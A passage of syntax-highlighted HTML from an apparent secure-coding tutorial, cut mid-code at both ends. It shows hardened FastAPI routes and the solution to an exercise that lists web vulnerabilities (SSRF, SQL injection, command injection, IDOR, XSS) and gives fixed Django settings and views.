class="nf">timedelta</span><span class="p">(</span><span class="n">minutes</span><span class="o">=</span><span class="mi">30</span><span class="p">)</span> <span class="n">to_encode</span><span class="p">.</span><span class="nf">update</span><span class="p">({</span><span class="sh">"</span><span class="s">exp</span><span class="sh">"</span><span class="p">:</span> <span class="n">expire</span><span class="p">})</span> <span class="n">token</span> <span class="o">=</span> <span class="sh">''</span> <span class="k">try</span><span class="p">:</span> <span class="n">token</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">encode</span><span class="p">(</span><span class="n">to_encode</span><span class="p">,</span> <span class="n">SECRET_KEY</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">)</span> <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">401</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Invalid credentials</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="n">token</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/login</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@limiter.limit</span><span class="p">(</span><span class="sh">"</span><span class="s">5/minute</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">login</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">username</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="nc">Form</span><span class="p">(...),</span> <span class="n">password</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="nc">Form</span><span class="p">(...)):</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">database.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT password FROM users WHERE username = ?</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">username</span><span class="p">,))</span> <span class="n">pwhash</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">pwhash</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">argon2</span><span class="p">.</span><span class="nf">verify</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="n">pwhash</span><span class="p">[</span><span class="mi">0</span><span class="p">]):</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">401</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Invalid credentials</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="n">token</span> <span class="o">=</span> <span class="nf">create_access_token</span><span class="p">({</span><span class="sh">"</span><span class="s">sub</span><span class="sh">"</span><span class="p">:</span> <span class="n">username</span><span class="p">})</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">access_token</span><span class="sh">"</span><span class="p">:</span> <span class="n">token</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/admin</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@limiter.limit</span><span class="p">(</span><span class="sh">"</span><span class="s">5/minute</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">admin_panel</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">token</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="nc">Depends</span><span class="p">(</span><span class="n">oauth2_scheme</span><span class="p">)):</span> <span class="k">try</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">SECRET_KEY</span><span class="p">,</span> <span class="n">algorithms</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">])</span> <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">403</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Unauthorized</span><span class="sh">"</span><span class="p">)</span> <span class="n">username</span> <span class="o">=</span> <span class="n">payload</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">sub</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">database.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT * FROM users WHERE username = ?</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">username</span><span class="p">,))</span> <span class="n">user</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">user</span> <span class="ow">or</span> <span class="n">user</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">!=</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">403</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Unauthorized</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Admin Panel</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/ping</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@limiter.limit</span><span class="p">(</span><span class="sh">"</span><span class="s">5/minute</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">ping_server</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">host</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="n">raw_arg_list</span> <span class="o">=</span> <span class="sh">"</span><span class="s">ping -c 4 </span><span class="sh">"</span> <span class="o">+</span> <span class="n">shlex</span><span class="p">.</span><span class="nf">quote</span><span class="p">(</span><span class="n">host</span><span class="p">)</span> <span class="n">cmd_list</span> <span class="o">=</span> <span class="n">shlex</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="n">raw_arg_list</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">cmd_list</span><span class="p">,</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">output</span><span class="sh">"</span><span class="p">:</span> <span class="n">result</span><span class="p">.</span><span class="n">stdout</span><span class="p">}</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/upload</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@limiter.limit</span><span class="p">(</span><span class="sh">"</span><span class="s">5/minute</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">upload_file</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="nb">file</span><span class="p">:</span> <span class="n">UploadFile</span> <span class="o">=</span> <span class="nc">File</span><span class="p">(...)):</span> <span class="n">base_dir</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">abspath</span><span class="p">(</span><span class="sh">'</span><span class="s">uploads</span><span class="sh">'</span><span class="p">)</span> <span class="n">pwd_file</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">abspath</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">base_dir</span><span class="p">,</span> <span class="nb">file</span><span class="p">.</span><span class="n">filename</span><span class="p">))</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">pwd_file</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="n">base_dir</span> <span class="o">+</span> <span class="n">os</span><span class="p">.</span><span class="n">sep</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">403</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Unauthorized</span><span class="sh">"</span><span class="p">)</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="n">pwd_file</span><span class="p">,</span> <span class="sh">"</span><span class="s">wb</span><span class="sh">"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">content</span> <span class="o">=</span> <span class="k">await</span> <span class="nb">file</span><span class="p">.</span><span class="nf">read</span><span class="p">()</span> <span class="n">f</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="n">content</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">File uploaded!</span><span class="sh">"</span><span class="p">}</span> </code></pre> </div> <h3> Solution — Exercise 4 </h3> <p><strong>Bugs found:</strong> Hardcoded secret, <code>DEBUG=True</code>, <code>ALLOWED_HOSTS=['*']</code>, SSRF (Capital One pattern), Path Traversal, SQLi, OS Command Injection, IDOR (get_report + admin_users), XSS via <code>x-html</code>, No Rate Limiting, No TLS</p> <p><strong><code>devdash/settings.py</code> — Fixed</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">os</span> <span class="kn">from</span> <span class="n">dotenv</span> <span class="kn">import</span> <span class="n">load_dotenv</span> <span class="nf">load_dotenv</span><span class="p">()</span> <span class="n">SECRET_KEY</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">SECRET_KEY</span><span class="sh">'</span><span class="p">)</span> <span class="n">COOKIE_KEY</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">COOKIE_KEY</span><span class="sh">'</span><span class="p">)</span> <span class="n">DEBUG</span> <span class="o">=</span> <span class="bp">False</span> <span class="n">ALLOWED_HOSTS</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">first_allow.com</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">second_allow.com</span><span class="sh">'</span><span class="p">]</span> <span class="n">INSTALLED_APPS</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">'</span><span class="s">django.contrib.admin</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.auth</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.contenttypes</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.sessions</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.messages</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.staticfiles</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">dashboard</span><span class="sh">'</span><span class="p">,</span> <span class="p">]</span> <span class="n">MIDDLEWARE</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">'</span><span class="s">django.middleware.security.SecurityMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.sessions.middleware.SessionMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.middleware.common.CommonMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.auth.middleware.AuthenticationMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.messages.middleware.MessageMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="p">]</span> <span class="n">SECURE_SSL_REDIRECT</span> <span class="o">=</span> <span class="bp">True</span> <span class="n">SECURE_HSTS_SECONDS</span> <span class="o">=</span> <span class="mi">31536000</span> <span class="n">SECURE_HSTS_INCLUDE_SUBDOMAINS</span> <span class="o">=</span> <span class="bp">True</span> <span class="n">SECURE_HSTS_PRELOAD</span> <span class="o">=</span> <span class="bp">True</span> </code></pre> </div> <p><strong><code>dashboard/views.py</code> — Fixed (key excerpts)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span><span class="p">,</span> <span class="n">get_object_or_404</span> <span class="kn">from</span> <span class="n">django.http</span> <span class="kn">import</span> <span class="n">JsonResponse</span> <span class="kn">from</span> <span class="n">django.contrib.auth.models</span> <span class="kn">import</span> <span class="n">User</span> <span class="kn">from</span> <span class="n">django.db</span> <span class="kn">import</span> <span class="n">connection</span> <span class="kn">from</span> <span class="n">django_ratelimit.decorators</span> <span class="kn">import</span> <span class="n">ratelimit</span> <span class="kn">from</span> <span class="n">django.views.decorators.csrf</span> <span class="kn">import</span> <span class="n">csrf_protect</span> <span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlparse</span> <span class="kn">from</span> <span class="n">dotenv</span> <span class="kn">import</span> <span class="n">load_dotenv</span> <span class="kn">import</span> <span class="n">jwt</span><span class="p">,</span> <span class="n">requests</span><span class="p">,</span> <span class="n">os</span><span class="p">,</span> <span class="n">shlex</span><span class="p">,</span> <span class="n">subprocess</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Report</span><span class="p">,</span> <span class="n">UserProfile</span> <span class="nf">load_dotenv</span><span class="p">()</span> <span class="n">COOKIE_KEY</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">COOKIE_KEY</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">is_valid_url</span><span class="p">(</span><span class="n">url</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">allow_list</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">str</span><span class="p">])</span> <span class="o">-&gt;</span> <span class="nb">bool</span><span class="p">:</span> <span class="n">parsed</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="n">hostname</span> <span class="o">=</span> <span class="n">parsed</span><span class="p">.</span><span class="n">netloc</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sh">'</span><span class="s">:</span><span class="sh">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="k">return</span> <span class="n">hostname</span> <span class="ow">in</span> <span class="n">allow_list</span> <span class="nd">@csrf_protect</span> <span class="nd">@ratelimit</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="sh">'</span><span class="s">ip</span><span class="sh">'</span><span class="p">,</span> <span class="n">rate</span><span class="o">=</span><span class="sh">'</span><span class="s">5/m</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">set_avatar</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">:</span> <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">COOKIES</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">report_token</span><span class="sh">'</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">token</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authenticated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">COOKIE_KEY</span><span class="p">,</span> <span class="n">algorithms</span><span class="o">=</span><span class="p">[</span><span class="sh">'</span><span class="s">HS256</span><span class="sh">'</span><span class="p">],</span> <span class="n">issuer</span><span class="o">=</span><span class="sh">"</span><span class="s">issuer_here</span><span class="sh">"</span><span class="p">,</span> <span class="n">audience</span><span class="o">=</span><span class="sh">"</span><span class="s">audience_here</span><span class="sh">"</span><span class="p">)</span> <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authenticated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="n">avatar_url</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">avatar_url</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">user_id</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">user_id</span><span class="sh">'</span><span class="p">)</span> <span class="k">if</span> <span class="nf">str</span><span class="p">(</span><span class="n">payload</span><span class="p">[</span><span class="sh">'</span><span class="s">user_id</span><span class="sh">'</span><span class="p">])</span> <span class="o">!=</span> <span class="nf">str</span><span class="p">(</span><span class="n">user_id</span><span class="p">):</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="n">allowlist_urls</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">first_allow.com</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">second_allow.com</span><span class="sh">'</span><span class="p">]</span> <span class="k">if</span> <span class="ow">not</span> <span class="nf">is_valid_url</span><span class="p">(</span><span class="n">avatar_url</span><span class="p">,</span> <span class="n">allowlist_urls</span><span class="p">):</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">avatar NOT updated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">405</span><span class="p">)</span> <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">avatar_url</span><span class="p">,</span> <span class="n">allow_redirects</span><span class="o">=</span><span class="bp">False</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">5</span><span class="p">)</span> <span class="n">base_dir</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">abspath</span><span class="p">(</span><span class="sh">'</span><span class="s">media/avatars</span><span class="sh">'</span><span class="p">)</span> <span class="n">pwd_file</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">abspath</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">base_dir</span><span class="p">,</span> <span class="sa">f</span><span class="sh">'</span><span class="si">{</span><span class="n">user_id</span><span class="si">}</span><span class="s">_avatar.png</span><span class="sh">'</span><span class="p">))</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">pwd_file</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="n">base_dir</span> <span class="o">+</span> <span class="n">os</span><span class="p">.</span><span class="n">sep</span><span class="p">):</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">avatar NOT updated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">405</span><span class="p">)</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="n">pwd_file</span><span class="p">,</span> <span class="sh">'</span><span class="s">wb</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="n">response</span><span class="p">.</span><span class="n">content</span><span class="p">)</span> <span class="n">profile</span> <span class="o">=</span> <span class="n">UserProfile</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">user_id</span><span class="o">=</span><span class="n">user_id</span><span class="p">)</span> <span class="n">profile</span><span class="p">.</span><span class="n">avatar_url</span> <span class="o">=</span> <span class="n">pwd_file</span> <span class="n">profile</span><span class="p">.</span><span class="nf">save</span><span class="p">()</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">status</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">avatar updated</span><span class="sh">'</span><span class="p">})</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">invalid method</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">405</span><span class="p">)</span> <span class="nd">@ratelimit</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="sh">'</span><span class="s">ip</span><span class="sh">'</span><span class="p">,</span> <span class="n">rate</span><span class="o">=</span><span class="sh">'</span><span class="s">5/m</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search_reports</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">q</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">q</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="k">with</span> <span class="n">connection</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="k">as</span> <span class="n">cursor</span><span class="p">:</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT id, title, content FROM dashboard_report WHERE title LIKE %s</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="sh">'</span><span class="s">%</span><span class="sh">'</span> <span class="o">+</span> <span class="n">q</span> <span class="o">+</span> <span class="sh">'</span><span class="s">%</span><span class="sh">'</span><span class="p">,)</span> <span class="p">)</span> <span class="n">rows</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchall</span><span class="p">()</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">results</span><span class="sh">'</span><span class="p">:</span> <span class="n">rows</span><span class="p">})</span> <span class="nd">@csrf_protect</span> <span class="nd">@ratelimit</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="sh">'</span><span class="s">ip</span><span class="sh">'</span><span class="p">,</span> <span class="n">rate</span><span class="o">=</span><span class="sh">'</span><span class="s">5/m</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_report</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">report_id</span><span class="p">):</span> <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">COOKIES</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">report_token</span><span class="sh">'</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">token</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authenticated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">COOKIE_KEY</span><span class="p">,</span> <span class="n">algorithms</span><span class="o">=</span><span class="p">[</span><span class="sh">'</span><span class="s">HS256</span><span class="sh">'</span><span class="p">],</span> <span class="n">issuer</span><span class="o">=</span><span class="sh">"</span><span class="s">issuer_here</span><span class="sh">"</span><span class="p">,</span> <span class="n">audience</span><span class="o">=</span><span class="sh">"</span><span class="s">audience_here</span><span class="sh">"</span><span class="p">)</span> <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authenticated</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="n">report</span> <span class="o">=</span> <span class="nf">get_object_or_404</span><span class="p">(</span><span class="n">Report</span><span class="p">,</span> <span class="nb">id</span><span class="o">=</span><span class="n">report_id</span><span class="p">)</span> <span class="k">if</span> <span class="n">payload</span><span class="p">[</span><span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">]</span> <span class="o">!=</span> <span class="n">report</span><span class="p">.</span><span class="n">owner</span><span class="p">.</span><span class="n">username</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">:</span> <span class="n">report</span><span class="p">.</span><span class="nb">id</span><span class="p">,</span> <span class="sh">'</span><span class="s">title</span><span class="sh">'</span><span class="p">:</span> <span class="n">report</span><span class="p">.</span><span class="n">title</span><span class="p">,</span> <span class="sh">'</span><span class="s">content</span><span class="sh">'</span><span class="p">:</span> <span class="n">report</span><span class="p">.</span><span class="n">content</span><span class="p">,</span> <span class="sh">'</span><span class="s">owner</span><span class="sh">'</span><span class="p">:</span> <span class="n">report</span><span class="p">.</span><span class="n">owner</span><span class="p">.</span><span class="n">username</span><span class="p">})</span> <span class="nd">@ratelimit</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="sh">'</span><span class="s">ip</span><span class="sh">'</span><span class="p">,</span> <span class="n">rate</span><span class="o">=</span><span class="sh">'</span><span class="s">5/m</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">run_diagnostic</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">:</span> <span class="n">target</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">target</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">target_sanitize</span> <span class="o">=</span> <span class="n">shlex</span><span class="p">.</span><span class="nf">quote</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="n">cmd</span> <span class="o">=</span> <span class="sh">'</span><span class="s">dig +short </span><span class="sh">'</span> <span class="o">+</span> <span class="n">target_sanitize</span> <span class="n">cmd_list</span> <span class="o">=</span> <span class="n">shlex</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span 